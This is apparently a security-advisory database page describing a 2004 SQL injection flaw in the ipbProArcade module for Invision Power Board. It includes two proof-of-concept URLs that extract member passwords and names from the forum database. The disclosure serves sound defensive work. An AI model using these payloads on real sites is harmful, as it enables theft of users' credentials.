exploits , vulnerabilities , articles , IPBProArcade Remote SQL Injection Vulnerability

Title	IPBProArcade Remote SQL Injection Vulnerability
Published	2004-11-20-12:00AM
Updated	2004-11-20-10:14PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Disclosure of this issue is credited to axl daivy <axlownz@gmail.com>.
Vulnerable	ipbProArcade ipbProArcade 2.5
Not Vulnerable
Code	No exploit is required to leverage this issue. The following proof of concept exploits have been provided: For modules installed on Invision Power Board versions 1.X: http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/* For modules installed on Invision Power Board versions 2.X: index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
• 2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability
• 2009-12-17 Digital Scribe Cross Site Scripting and SQL Injection Vulnerabilities
• 2009-12-17 WP-Forum WordPress Plugin Multiple SQL Injection Vulnerabilities
• 2009-12-17 Quick Heal AntiVirus Insecure Program File Permissions Local Privilege Escalation Vulnerability
• 2009-12-17 IntelliCom NetBiter webSCADA Multiple Default Password Security Bypass Vulnerabilities
• 2009-12-17 Webmatic Multiple Unspecified SQL Injection and Cross-Site Scripting Vulnerabilities
• 2009-12-17 ManageEngine Password Manager Pro Cross Site Scripting Vulnerability
• 2009-12-17 HP OpenView Storage Data Protector Multiple Remote Code Execution Vulnerabilities
• 2009-12-17 iDevSpot iSupport Multiple Cross Site Scripting Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 01:12:43 +0000